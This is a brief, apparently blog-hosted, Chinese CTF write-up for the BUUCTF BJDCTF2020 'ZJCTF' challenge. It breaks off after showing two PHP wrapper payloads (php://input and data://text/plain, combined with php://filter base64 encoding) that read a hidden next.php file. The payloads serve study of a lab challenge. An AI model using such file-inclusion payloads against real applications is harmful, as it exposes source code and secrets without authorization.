您当前的位置: 首页 > 

Snakin_ya

暂无认证

  • 2浏览

    0关注

    107博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

[BUUCTF][BJDCTF2020]ZJCTF,不过如此

Snakin_ya 发布时间:2022-01-24 00:52:35 ,浏览量:2

考点

代码审计

命令执行

解题

打开环境

 

首先注释中提示next.php,我们可以利用php伪协议获取

  1. php://input
text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php
POST:
I have a dream
  1. data://text/plain
text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php

得到源码:

            
关注
打赏
1650510800
查看更多评论
0.0367s